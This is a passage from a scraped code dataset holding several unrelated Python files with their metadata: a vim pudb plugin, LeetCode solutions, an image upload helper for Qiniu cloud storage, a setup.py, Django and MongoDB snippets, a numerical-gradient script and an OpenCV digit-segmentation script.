vim.eval('input(\"New Condition: \", \"%s\")' % old_cond)\n vim.eval('inputrestore()')\n vim.command('echohl None')\n\n save_breakpoints(bps.values())\n update_breakpoints()\n\n\ndef clear_all_breakpoints():\n \"\"\"\n Clears all pudb breakpoints from all files.\n \"\"\"\n save_breakpoints([])\n update_breakpoints()\n\n\ndef list_breakpoints():\n \"\"\"\n Prints a list of all the breakpoints in all files.\n Shows the full file path, line number, and condition of each breakpoint.\n \"\"\"\n update_breakpoints()\n vim.command('echomsg \"Listing all pudb breakpoints:\"')\n for bp_string in breakpoint_strings():\n vim.command('echomsg \"%s\"' % bp_string)\n\n\ndef 
populate_list(list_command):\n \"\"\"\n Calls the given vim command with a list of the breakpoints as strings in\n quickfix format.\n \"\"\"\n update_breakpoints()\n bps = list(breakpoint_strings())\n vim.command('%s %s' % (list_command, bps))\n\n\ndef quickfix_list():\n \"\"\"\n Populate the quickfix list with the breakpoint locations.\n \"\"\"\n populate_list('cgetexpr')\n\n\ndef location_list():\n \"\"\"\n Populate the location list with the breakpoint locations.\n \"\"\"\n populate_list('lgetexpr')\n\n\ndef clear_linecache():\n \"\"\"\n Clear the python line cache for the given file if it has changed\n \"\"\"\n filename = vim.current.buffer.name\n checkcache(filename)\n update_breakpoints()\n","sub_path":"pythonx/pudb_and_jam.py","file_name":"pudb_and_jam.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"179584938","text":"# https://leetcode.com/problems/max-increase-to-keep-city-skyline/description/\nclass Solution:\n def maxIncreaseKeepingSkyline(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n m = len(grid)\n n = len(grid[0])\n maxrows = []\n maxcols = []\n res = 0\n for i in range(m):\n maxrow = 0\n for j in range(n):\n if grid[i][j] > maxrow:\n maxrow = grid[i][j]\n maxrows.append(maxrow)\n \n for j in range(n):\n maxcol = 0\n for i in range(m):\n if grid[i][j] > maxcol:\n maxcol = grid[i][j] \n maxcols.append(maxcol)\n \n print(maxrows)\n print(maxcols)\n for i in range(m):\n for j in range(n):\n minrc = min(maxrows[i], maxcols[j])\n res += minrc - grid[i][j]\n return res\n ","sub_path":"Test/NotCSharp/Python/MaxIncreaseInCitySkyline.py","file_name":"MaxIncreaseInCitySkyline.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"375356646","text":"# -*- coding:utf-8 -*-\n\nimport configparser\nimport uuid\nimport tempfile\nimport os\nfrom PIL import Image\nfrom qiniu import Auth, put_file\n\n# 读取配置文件\ncfg = configparser.ConfigParser()\ncfg.read('settings.cfg')\n\nIMAGE_MAX_SIZE = 4 * 1024 * 1024\nIMAGE_PATH = \"./upload/\"\nQINIU_URL = cfg['qiniu']['url']\n\nimage_types = (\n 'image/gif',\n 'image/jpeg',\n 'image/pjpeg',\n 'image/bmp',\n 'image/png',\n 'image/x-png')\n\n# 生成头像\ndef convert_avatar(picture, picture_info, tmp_name):\n originalWidth, originalHeight = picture.size\n\n scale = originalWidth / picture_info.get('previewWidth')\n\n box = (picture_info['clipX1'] * scale, picture_info['clipY1'] * scale, picture_info['clipX2'] * scale, picture_info['clipY2'] * scale)\n\n region = picture.crop(box)\n region.thumbnail((200, 200))\n region.save(tmp_name)\n\n# 上传到服务器\ndef upload_server(files, picture_info=None):\n # 验证是否传参\n if 'picture' not in files:\n return {\n \"picture\": None,\n \"error\": \"参数错误\"\n }\n\n # 验证图片格式\n send_file = files['picture'][0]\n if send_file['content_type'] not in image_types:\n return {\n \"picture\": None,\n \"error\": \"图片格式错误\"\n }\n\n # 验证图片大小\n if len(send_file['body']) > IMAGE_MAX_SIZE:\n return {\n \"picture\": None,\n \"error\": '图片不能大于4MB'\n }\n\n # 图片格式\n image_format = send_file['filename'].split('.').pop().lower()\n tmp_name = \"%s%s.%s\" % (IMAGE_PATH, uuid.uuid1(), image_format)\n\n if image_format == 'gif': # PIL保存gif有问题,只保存了第一帧\n fin = open(tmp_name, 'wb')\n fin.write(send_file['body'])\n fin.close()\n else:\n tmp_file = tempfile.NamedTemporaryFile(delete=True)\n tmp_file.write(send_file['body'])\n 
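        # seek(0) also flushes the bytes just written, so the temp file can be re-read from disk below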
tmp_file.seek(0)\n\n try:\n image_one = Image.open(tmp_file.name)\n\n if picture_info != None: # 头像\n convert_avatar(image_one, picture_info, tmp_name)\n else:\n image_one.save(tmp_name)\n\n tmp_file.close()\n except:\n tmp_file.close()\n return {\n \"picture\": None,\n \"error\": \"图片异常\"\n }\n\n return {\n \"picture\": tmp_name,\n \"error\": None\n }\n\ndef get_qiniu_token(key=None, expires=3600):\n # 需要填写你的 Access Key 和 Secret Key\n access_key = cfg['qiniu']['access_key']\n secret_key = cfg['qiniu']['secret_key']\n\n # 构建鉴权对象\n q = Auth(access_key, secret_key)\n\n # 要上传的空间\n bucket_name = cfg['qiniu']['bucket_name']\n\n policy = {\n \"returnBody\": '{\"key\": $(key), \"hash\": $(etag), \"w\": $(imageInfo.width), \"h\": $(imageInfo.height)}',\n \"saveKey\": '$(etag)$(ext)'\n }\n\n token = q.upload_token(bucket_name, key, expires, policy)\n\n return token\n\n# 上传到七牛\ndef upload_qiniu(localfile):\n # 上传到七牛后保存的文件名\n #image_format = localfile.split('.').pop()\n #image_name = uuid.uuid1()\n \n #key = \"%s.%s\" % (image_name, image_format)\n\n # $(ext) .png\n # saveKey 文件命名规则\n\n # 生成上传Token,可以指定过期时间等\n token = get_qiniu_token(None, 3600)\n\n try:\n ret, info = put_file(token, None, localfile)\n os.remove(localfile)\n ret['url'] = '%s%s' % (QINIU_URL, ret.get('key'))\n return ret\n except:\n os.remove(localfile)\n return None\n\n# 上传图片\ndef upload_picture(files, picture_info=None):\n # 上传到服务器\n picture = upload_server(files, picture_info)\n if picture['picture']:\n # 上传到七牛\n return upload_qiniu(picture['picture'])\n else:\n return None","sub_path":"site/utils/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"433434455","text":"import setuptools\n\n\nwith open('README.md', 'r') as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='croo',\n version='0.4.2.1',\n scripts=['bin/croo'],\n python_requires='>=3.6',\n author='Jin Lee',\n author_email='leepc12@gmail.com',\n description='CRomwell Output Organizer',\n long_description='https://github.com/ENCODE-DCC/croo',\n long_description_content_type='text/markdown',\n url='https://github.com/ENCODE-DCC/croo',\n packages=setuptools.find_packages(exclude=['examples', 'docs']),\n classifiers=[\n 'Programming Language :: Python :: 3',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: POSIX :: Linux',\n ],\n install_requires=['autouri>=0.1.2.1', 'graphviz', 'miniwdl', 'caper']\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"136692407","text":"import math\nclass Solution:\n # @param {integer} n\n # @param {integer} k\n # @return {string}\n def getPermutation(self, n, k):\n numbers = range(1, n+1)\n permutation = ''\n k -= 1\n while n > 0:\n n -= 1\n # get the index of current digit\n index, k = divmod(k, math.factorial(n))\n permutation += str(numbers[index])\n # remove handled number\n numbers.remove(numbers[index])\n\n return permutation\n\n def getPermutation(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: str\n \"\"\"\n k -= 1\n total = 1\n fac_sum = [1]\n for n in range(1,n+1):\n total *= n\n fac_sum.append(total)\n count = [n for n in range(1,n+1)]\n ans = \"\"\n for i in range(1,n+1):\n idx = int(k/fac_sum[n-i])\n ans += str(count[idx])\n count.pop(idx)\n k -= idx*fac_sum[n-i]\n return 
ans\n","sub_path":"Python/60.py","file_name":"60.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"501750426","text":"from __future__ import print_function\n\na = []\nn, m = [int(x) for x in input().split()]\n\nfor i in range(0, n):\n\tb = []\n\tfor j in input().split():\n\t\tb.append(int(j))\n\ta.append(b)\n\nmaxn = a[0][0]\nnumr = 0\nfor i in range(0, n):\n\tfor j in range(0, m):\n\t\tif a[i][j] > maxn:\n\t\t\tmaxn = a[i][j]\n\t\t\tnumr = i \n\nmaxes = []\nmaxes.append(numr)\nfor i in range(0, n):\n\tfor j in range(0, m):\n\t\tif a[i][j] == maxn and i != numr:\n\t\t\tmaxes.append(i)\n\nb = []\nmaxsum = 0\nfor i in range(0, len(maxes)):\n\tb.append(0)\n\tfor j in range(0, m):\n\t\tb[i] = b[i] + a[i][j]\n\tif b[i] > maxsum:\n\t\tmaxsum = b[i]\n\t\tnumr = i\n\nprint(numr)\n\n\n\n\n","sub_path":"week10/arrays/358.py","file_name":"358.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"499640708","text":"# -*- coding: utf-8 -*-\nfrom django.http import HttpResponse\nfrom django.template import RequestContext\nfrom primus.base.views import BaseListView\nfrom django.shortcuts import render_to_response\nfrom promotion.models import *\n\ndef promotion (request, slug):\n promotion = Promotion.objects.get(slug=slug)\n promotion_items = PromotionItem.objects.filter(promotion=promotion)\n items = [p_i.item for p_i in promotion_items]\n \n\n context = BaseListView(request, items).run()\n \n context.update({\n 'title': '',\n 'header': promotion.description,\n 'app_shop': True,\n })\n return render_to_response('promotion/list%s.html' % ('_include' if request.is_ajax() else ''),\n context,\n context_instance=RequestContext(request))\n ","sub_path":"promotion/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"447673227","text":"\"\"\"\n第7章 映像和集合类型\n本章主题\n♦ 映射类型:字典\n♦ 操作符\n♦ 内建函数\n♦ 内建方法\n♦ 字典的键\n♦ 集合类型\n♦ 操作符\n♦ 内建函数\n♦ 内建方法\n♦ 相关模块\n\n本章我们来讨论Python语言中的映像类型和集合类型。和前面的章节一样,我们首先做一个介绍,再来讨论可用操作符,工厂函数、内建函数(BIF)和方法,然后再来看看每种数据类型的详细用法。\n\n7.1 映射类型:字典\n字典是Python语言中唯一的映射类型。映射类型对象里哈希值(键,key)和指向的对象(值。value)是一对多的关系。它们与Perl中的哈希类型(译者注:又称关联数组)相似,通常被认为是可变的哈希表。\n一个字典对象是可变的,它是一个容器类型,能存储任意个数的Python对象,其中也包括其他容器类型。字典类型和序列类型容器类(列表、元组)的区别是存储和访问数据的方式不同。序列类型只用数字类型的键(从序列的开始起按数值顺序索引)。映射类型可以用其他对象类型做键,一般最常见的是用字符串做键。\n和序列类型的键不同,映像类型的键直接或间接地和存储的数据值相��联。但因为在映射类型中,我们不再用“序列化排序”的键,所以映像类型中的数据是无序排列的。\n显然,这并不影响我们使用映射类型,因为映射类型不要求用数字值做索引以从一个容器中获取对应的数据项。你可以用键直接“映射”到值,这就是为什么叫映射类型(“mapping type”)的原因。映射类型通常被称做哈希表,是因为字典对象就是哈希类型的。字典是Python中最强大的数据类型之一。\n核心笔记:什么是哈希表?它们与字典的关系是什么?\n序列类型用有序的数字键做索引将数据以数组的形式存储。一般索引值与所存储的数据毫无关系。还可以用另一种方式来存储数据:基于某种相关值,比如说一个字符串。我们在日常生活中一直这么做。把人们的电话号码按照他们的姓记录在电话簿上,按照时间在日历或约会簿上添加事件,等等。\n在这些例子中,你的键就是和数据项相关的值。哈希表是一种数据结构:它按照我们所要求的去工作。哈希表中存储的每一条数据,叫做一个值(value),是根据与它相关的一个被称作为键(key)的数据项进行存储的。键和值合在一起被称为“键-值对”(key-value pairs)。\n哈希表的算法是获取键,对键执行一个叫做哈希函数的操作,并根据计算的结果,选择在数据结构的某个地址中来存储你的值。任何一个值存储的地址皆取决于它的键。正因为这种随意性,哈希表中的值是没有顺序的。你拥有的是一个无序的数据集。\n你所能获得的有序集合只能是字典中的键的集合或者值的集合。方法Keys()或values()返回一个列表,该列表是可排序的。你还可以用items()方法得到包含键、值对的元组的列表来排序。由于字典本身是哈希的,所以是无序的。\n哈希表一般有很好的性能,因为用键查询相当快。\nPython的字典是作为可变的哈希表实现的。如果你熟悉Perl的话,就可以发现字典与Perl中的“关系数组”或散列相似。\n现在我们就来研究Python字典。一个字典条目的语法格式是键值。而且,多条字典条目被包含在大括号({})里。\n\"\"\"\n\n\"\"\"\n7.1.1 如何创建字典和给字典赋值\n创建字典只需要把字典赋值给一个变量,不管这个字典是否包含元素。\n>>> dict1 = {}\n>>> dict2 = {'name': 'earth', 'port': 80}\n>>> 
dict1, dict2\n({}, {'port': 80, 'name': 'earth'})\n\"\"\"\ndict1 = {}\ndict2 = {'name': 'earch', 'port':\"80\"}\nprint(dict1)\nprint(dict2)\n\n\"\"\"\n从Python 2.2版本起,可以用工厂方法dict()来创建字典。当我们详细讨论dict()的时候会看到更多的例子,现在来看一个小例子。\n>>> fdict = dict((['x', 1], ['y', 2]))\n>>> fdict\n{'y': 2, 'x': 1}\n\"\"\"\nfdict = dict((['x', 1], ['y', 2]))\nprint(fdict)\n\"\"\"\n从Python 2.3版本起,可以用一个很方便的内建方法fromkeys()来创建一个“默认”字典,字典中元素具有相同的值(如果没有给出,默认为None)\n>>> ddict = {}.fromkeys(('x', 'y'), -1)\n>>> ddict\n{'y': -1, 'x': -1}print(dirt)\n>>> edict = {}.fromkeys(('foo', 'bar'))\n>>> edict\n{'foo': None, 'bar': None}\n\"\"\"\nddict = {}.fromkeys(('x', 'y'), -1)\nprint(ddict)\nedict = {}.fromkeys(('foo', 'bar'))\nprint(edict)\n\n\"\"\"\n7.1.2 如何访问字典中的值\n要想遍历一个字典(一般用键),你只需要循环查看它的键,像这样>>> dict2 = {'name': 'earth', 'port': 80}\n>>>\n>>>> for key in dict2.keys():\n... print 'key=%s, value=%s' % (key, dict2[key])\n...\nkey=name, value=earth\nkey=port, value=80\n\"\"\"\ndict2 = {'name': 'earch', 'port':80}\nfor key in dict2.keys():\n print(\"key = %s, value = %s\" % (key, dict2[key]))\n\"\"\"\n从Python 2.2开始,你可以不必再用keys()方法获取供循环使用的键值列表了。可以用迭代器来轻松地访问类序列对象(sequence-like objects),比如字典和文件。只需要用字典的名字就可以在for循环里遍历字典。\n>>> dict2 = {'name': 'earth', 'port': 80}\n>>>\n>>>> for key in dict2:\n... print 'key=%s, value=%s' % (key, dict2[key])\n...\nkey=name, value=earth\nkey=port, value=80\n\"\"\"\nfor key in dict2:\n print(\"key = %s, value = %s\" % (key, dict2[key]))\n\"\"\"要得到字典中某个元素的值,可以用你所熟悉的字典键加上中括号来得到。\n>>> dict2['name']\n'earth'\n>>>\n>>> print 'host %s is running on port %d' % \\\n... (dict2['name'], dict2['port'])\nhost earth is running on port 80\n字典dict1是空的,字典dict2有两个数据元素。字典dict2的键是‘name’和‘port’,它们对应的值分别是‘earth’和80。就像你看到的,通过键‘name’可以得到字典中的元素的值。\n如果我们想访问该字典中的一个数据元素,而它在这个字典中没有对应的键,将会产生一个错误:\n>>> dict2['server'] Traceback (innermost last):\nFile \"\", line 1, in ?\nKeyError: server\n在这个例子中,我们试图获得字典中‘server’键所对应的值。你从上面的代码知道,‘server’这个键并不存在。检查一个字典中是否有某个键的最好方法是用字典的has_key()方法,或者另一种比较好的方法就是从2.2版本起用的,in或not in操作符。has_key()方法将会在未来的Python版本中弃用,所以用in或not in是最好的方法。\n下面我们将介绍字典所有的方法。方法has_key()和in以及not in操作符都是布尔类型的。对于前两者而言,如果字典中有该键就返回真(True),否则返回假(False) (Python 2.3版本以前,没有布尔常量,为真时返回1,假时返回0)。\n>>> 'server' in dict2 # 或 dict2.has_key('server')\nFalse\n>>> 'name' in dict # 或 dict2.has_key('name')\nTrue\n>>> dict2['name']\n'earth'\n\"\"\"\nprint('server' in dict2)\nprint('name' in dict1)\n\"\"\"\n一个字典中混用数字和字符串的例子:\n\"\"\"\ndict3 = {}\ndict3[1] = 'abc'\ndict3['1'] = 3.14\ndict3[3.2] = 'xyz'\nprint(dict3)\n\"\"\"\n除了逐一地添加每个键-值对外,我们也可以给dict3整体赋值。\ndict3 = {3.2: 'xyz', 1: 'abc', '1': 3.14159}\n如果事先已经知道所有的数据就可以用键-值对来创建一个字典(这是显而易见的)。通过字典dict3的示例说明你可以采用各种类型的数据作为字典的键。如果我们被问到是否可以改变某个字典值的键时,你可能会说“不”,对吗?\n为什么在执行中字典中的键不允许被改变呢?你这样想就会明白:比方说,你创建了一个字典,字典中包含一个元素(一个键和一个值)。可能是由于某个变量的改变导致键发生了改变。这时候你如果用原来的键来取出字典里的数据, 会得到KeyError(因为键的值已经改变了),现在你没办法从字典中获取该值了,因为键本身的值发生了变化。\n由于上面的原因,字典中的键必须是可哈希的,所以数字和字符串可以作为字典中的键,但是列表和其他字典不行(见7.5.2小节字典的键必须是可哈希的)。\n\"\"\"\n\n\"\"\"\n7.1.3 如何更新字典\n你可以通过以下几种方式对一个字典做修改:添加一个新数据项或新元素(即,一个键-值对);修改一个已存在的数据项;或删除一个已存在的数据项(下面有关于数据项删除操作的详细讲述)。\n>>> dict2['name'] = 'venus' # 更新已有条目\n>>> dict2['port'] = 6969 # 更新已有条目\n>>> dict2['arch'] = 'sunos5'# 增加新条目\n>>>\n>>> print 'host %(name)s is running on port %(port)d' %dict2\nhost venus is running on port 6969\n\"\"\"\ndict2['name'] = 'venus'\ndict2['port'] = 6969\ndict2['arch'] = 'aaa'\nprint(\"host %(name)s is runing on port %(port)d\" % 
dict2)\n"""\n如果字典中该键已经存在,则字典中该键对应的值将被新值替代。上面的print语句展示了另一种在字典中使用字符串格式符(%)的方法。用字典参数可以简化print语句,因为这样做你只需要用到一次该字典的名字,而不用在每个元素出现的时候都用元组参数表示。你也可以用内建方法update()将整个字典的内容添加到另一个字典。我们将在7.4节介绍此方法。\n\n7.1.4 如何删除字典元素和字典\n删除整个字典的操作不常见。通常,你删除字典中的单个元素或是清除整个字典的内容。但是,如果你真想“删除”一个字典,用del语句(介绍见小节3.5.5)。以下是删除字典和字典元素的例子。\n"""\ndel dict2['name']\ndict2.clear()\nprint(dict2)\ndel dict2\n"""\n核心提示:避免使用内建对象名字作为变量的标识符\n如果在Python2.3前,你已经开始使用Python,你可能用dict作为一个字典的标识符。但是,因为dict()现在已成为Python的类型和工厂方法,重载dict()会给你带来麻烦和潜在的bugs。编译器允许你做这样的重载,它认为你是聪明的,知道自己正在做什么!小心。请不要用dict、list、file、bool、str、input、len这样的内建类型为变量命名。\n"""\n\n","sub_path":"CorePythonAP/7_Mapping/7_1_Mapping_Type_Dictionaries.py","file_name":"7_1_Mapping_Type_Dictionaries.py","file_ext":"py","file_size_in_byte":10506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"525445403","text":"import pymongo\nfrom bson import ObjectId\nfrom datetime import datetime\n\nclass Editor():\n    def __str__(self) -> str:\n        return str(self.toDictionary())\n\n    def toDictionary(self):\n        dico = {\n            \"NbrTVA\": self.NbrTVA,\n            \"name\": self.name,\n            \"creationDate\": self.creationDate,\n            \"books\": self.books\n        }\n        return dico\n\n    def save(self):\n        if not self._id:\n            self.collection.insert_one(self.toDictionary())\n            editor = self.collection.find_one({ \"NbrTVA\": self.NbrTVA, \"name\": self.name })\n            self._id = editor[\"_id\"]\n        else:\n            self.collection.update_one({ \"_id\": self._id }, { \"$set\" : self.toDictionary() })\n\n    def delete(self):\n        if self._id:\n            self.collection.find_one_and_delete({ \"_id\": self._id })\n\n    def __init__(self, collection, NbrTVA, name):\n        self.collection = collection\n        editor = self.collection.find_one({ \"NbrTVA\": NbrTVA, \"name\": name })\n        if editor:\n            self._id = editor[\"_id\"]\n            self.NbrTVA = editor[\"NbrTVA\"]\n            self.name = editor[\"name\"]\n            self.creationDate = editor[\"creationDate\"]\n            self.books = editor[\"books\"]\n        else:\n            self._id = 0\n            self.NbrTVA = NbrTVA\n            self.name = name\n            self.creationDate = datetime.now()\n            self.books = []","sub_path":"04_mango_db/DayThree/models/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"563545877","text":"tests = input()\ntests = int(tests)\n\nlists = []\nfor i in range(tests):\n    list1 = list(map(int, input().split()))\n    lists.append(list1)\n\ndef IsPrime(num):\n    if num == 1:\n        return False\n\n    for i in range(2, num // 2 + 1):\n        if num % i == 0:\n            return False\n    return True\n\ndef func(object):\n    result = []\n    for i in range(object[0], (object[1])+1):\n        num = int(i)\n        if IsPrime(num):\n            result.append(num)\n    for i in range(len(result)):\n        if i == len(result)-1:\n            print(str(result[i]), end=\"\")\n        else:\n            print(str(result[i]) + \" \", end=\"\")\n    print()\n\nfor i in range(len(lists)):\n    func(lists[i])","sub_path":"Code/CodeRecords/2194/60590/235081.py","file_name":"235081.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"560126873","text":"import numpy as np\n\ndef controlpoints(Ncp, z1, z2, eps=0, include_ends=False):\n    #thetacp = np.arange(np.pi, 0, -np.pi/self.Ncp) - 0.5 * np.pi/self.Ncp\n    # The following works MUCH better for a uniform head along the line\n    thetacp = np.linspace(np.pi, 0, Ncp+2)[1:-1]\n    if include_ends:\n        Zcp = np.zeros(Ncp+2, 'D')\n        Zcp[0] = -1\n        Zcp[-1] = 1\n        Zcp[1:-1] = 
np.cos(thetacp)\n    else:\n        #thetacp = np.arange(np.pi, 0, -np.pi/Ncp) - 0.5 * np.pi/Ncp\n        Zcp = np.zeros(Ncp, 'D')\n        Zcp.real = np.cos(thetacp)\n        Zcp.imag = eps # control point just on positive side (this is handy later on)\n    zcp = Zcp * (z2 - z1) / 2.0 + 0.5 * (z1 + z2)\n    return zcp.real, zcp.imag","sub_path":"tethysapp/aemdewater2/timml/dev/timml/controlpoints.py","file_name":"controlpoints.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"72454620","text":"import numpy as np\nimport matplotlib.pylab as plt\n\ndef function_1(x):\n    return 0.01*x**2 + 0.1*x\n\ndef numerical_gradient(f, x):\n    h = 1e-4\n    grad = np.zeros_like(x)\n\n    for idx in range(x.size):\n        tmp_val = x[idx]\n        x[idx] = tmp_val + h\n        fxh1 = f(x)\n\n        x[idx] = tmp_val - h\n        fxh2 = f(x)\n\n        # central difference over the two probes computed above\n        grad[idx] = (fxh1 - fxh2) / (2*h)\n        x[idx] = tmp_val\n    return grad\n\ndef gradient_descent(f, init_x, lr=0.01, step_num=100):\n    x = init_x\n\n    for i in range(step_num):\n        grad = numerical_gradient(f, x)\n        x -= lr * grad\n    return x\n\n# minimal softmax/cross-entropy so simpleNet.loss is runnable on its own\ndef softmax(a):\n    a = a - np.max(a)  # stabilise the exponentials\n    exp_a = np.exp(a)\n    return exp_a / np.sum(exp_a)\n\ndef cross_entropy_error(y, t):\n    return -np.sum(t * np.log(y + 1e-7))  # t is assumed one-hot\n\nclass simpleNet:\n    def __init__(self):\n        self.W = np.random.randn(2, 3)\n\n    def predict(self, x):\n        return np.dot(x, self.W)\n\n    def loss(self, x, t):\n        z = self.predict(x)\n        y = softmax(z)\n        loss = cross_entropy_error(y, t)\n        return loss\n\n\nx = np.arange(0.0, 20.0, 0.1)\ny = function_1(x)\nplt.xlabel(\"x\")\nplt.ylabel(\"f(x)\")\nplt.plot(x, y)\nplt.show()\n","sub_path":"section4/gradient.py","file_name":"gradient.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"246478428","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 25 22:16:17 2018\n\n@author: Ganesh_Bhargav\n\"\"\"\n\n# Import the modules\nimport cv2\nimport sys\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom operator import itemgetter\nimport functools\n\n#from sklearn.externals import joblib\n#from skimage.feature import hog\n#import numpy as np\n\n# Load the classifier\n#clf = joblib.load(\"digits_cls.pkl\")\n\nim = []\n\ndef readCroppedImage():\n    global im\n    im = cv2.imread(\"identifycells/croppedImage.jpg\")\n#im = cv2.imread('2.jpg')\n#cv2.imshow(\"image\",im)\n\nrects = []\n\n# Read the input image \ndef preprocess():\n    global im\n    global rects\n    \n    # Convert to grayscale and apply Gaussian filtering\n    im_gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n    im_gray = cv2.GaussianBlur(im_gray, (5, 5), 0)\n    \n    # Threshold the image\n    ret, im_th = cv2.threshold(im_gray, 90, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n    #cv2.imshow(\"im_th:\",im_th)\n    # Find contours in the image\n    _,ctrs, hier = cv2.findContours(im_th.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n    \n    # Get a bounding rectangle for each contour\n    rects = [cv2.boundingRect(ctr) for ctr in ctrs]\n\n\"\"\"\ndef getKey(item):\n    #print(\"verify x = \",item[0][0])\n    return item[0][1]\n\ndef sortDigitImages(digitImages):\n    sortedbyx = sorted(digitImages,key= getKey) \n    print('sorted by x =',sortedbyx)\n    for image in sortedbyx:\n        print(\"coords = \",image[0])\n        print(\"Image =\",image[1])\n        plt.imshow(image[1])\n        plt.show()\n        key = cv2.waitKey(0)\n        if key == 27:\n            sys.exit(0)\n    return sortedbyx\n\"\"\"\n\n# For each rectangular region, calculate HOG features and predict\n# the digit using Linear SVM.\ndef getDigitsImages():\n    global im\n    global rects\n    #Digit images by coords\n    digitImagesbyCoord = []\n    #Images of each digit\n    digitImages = []\n    #coordinates of each rectangle\n    coords = []\n    
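    # count numbers the per-digit crop files written below as digitrecognize/digits/digits<count>.jpg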
count = 1\n #rects = sort_contours(ctrs)\n for rect in rects:\n \n x = rect[0]\n y = rect[1]\n w = rect[2]\n h = rect[3]\n # Draw the rectangles\n #print(\"rects = \",rects)\n cv2.rectangle(im, (rect[0], rect[1]), (rect[0] + rect[2], rect[1] + rect[3]), (0, 255, 0), 3) \n #print(\"rect[0] = \",rect[0])\n \n eachcoord = [(x,y),(x+w,y),(x+w,y+h),(x,y+h)]\n coords.append(eachcoord)\n #eachcoord = (rect[0] + rect[2], rect[1] + rect[3])\n # Coords also contains the bounding box for the entire image\n #coords.append(eachcoord)\n #print(\"eachcoord = \",eachcoord)\n # Mark th edge points in the image with a circle\n cv2.circle(im, (rect[0], rect[1]), 10, (255,0,0), -1)\n cv2.circle(im, (rect[0] + rect[2], rect[1] + rect[3]), 10, (255,0,0), -1)\n \n\n \n roi = im[y:y+h,x:x+w]\n \n filename = \"digitrecognize/digits/digits\"+str(count)+\".jpg\"\n cv2.imwrite(filename,roi)\n digitImages.append(roi)\n digitImagesbyCoord.append((rect,roi))\n count += 1\n #plt.imshow(roi)\n #plt.show()\n #cv2.imshow(\"roi\", roi)\n #plt.show()\n #key = cv2.waitKey(0)\n #if key == 27:\n # sys.exit(0)\n # Make the rectangular region around the digit\n #leng = int(rect[3] * 1.6)\n #pt1 = int(rect[1] + rect[3] // 2 - leng // 2)\n #pt2 = int(rect[0] + rect[2] // 2 - leng // 2)\n #roi = im_th[pt1:pt1+leng, pt2:pt2+leng]\n \n #print(\"Bounding rectangle dimensions:\")\n #print(\"pt1:\",pt1)\n #print(\"pt2:\",pt1+leng)\n #print(\"pt3:\",pt2)\n #print(\"pt4:\",pt2+leng)\n # Resize the image\n #roi = cv2.resize(roi, (28, 28), interpolation=cv2.INTER_AREA)\n #roi = cv2.dilate(roi, (3, 3))\n # Calculate the HOG features\n #roi_hog_fd = hog(roi, orientations=9, pixels_per_cell=(14, 14), cells_per_block=(1, 1), visualise=False)\n #nbr = clf.predict(np.array([roi_hog_fd], 'float64'))\n \n #cv2.putText(im, \"\", (rect[0], rect[1]),cv2.FONT_HERSHEY_DUPLEX, 2, (0, 255, 255), 3)\n \n #cv2.imshow(\"Resulting Image with Rectangular ROIs\", im)\n cv2.imwrite(\"digitrecognize/image.png\",im)\n #cv2.waitKey()\n return digitImagesbyCoord\n\n\t\ndef get_box_precedence(eachdigitImage, cols, imageName):\n tolerance_factor = 70\n if imageName == 'image1.jpg':\n tolerance_factor = 100\n elif imageName == 'image2.jpg':\n tolerance_factor = 70\n elif imageName == 'image3.jpg':\n tolerance_factor = 70\n\t\t\n #origin = cv2.boundingRect(contour)\n origin = eachdigitImage[0]\n print('origin[0] = ',origin[0])\n print('origin[1] = ',origin[1])\n print('get_box_precedence = ',((origin[1] // tolerance_factor) * tolerance_factor)*cols + origin[0])\n return ((origin[1] // tolerance_factor) * tolerance_factor)*cols + origin[0]\n #return origin[1] * cols + origin[0]\n\ndef sortDigitImagesTBLR(digitImages,imageName):\n #origin = digitImages[0]\n digitImages.sort(key=lambda x: get_box_precedence(x,im.shape[1],imageName))\n return digitImages\n\ndef removeSmallImages(digitImages):\n #print(\"len(digitImages = )\",len(digitImages))\n #print('parameter = ',digitImages)\n digitImagesBig = []\n #digitImageSize = len(digitImages)\n for i in range(0,len(digitImages)):\n image = digitImages[i]\n if image[1].shape[0] < 90:\n pass\n elif image[1].shape[1] < 90:\n pass\n else:\n digitImagesBig.append(image)\n return digitImagesBig\n\n\"\"\"\npreprocess()\ndigitImages = getDigitsImages()\n#digitImages = sortDigitImages(digitImages)\ndigitImages = sortDigitImagesTBLR(digitImages)\ndigitImages = 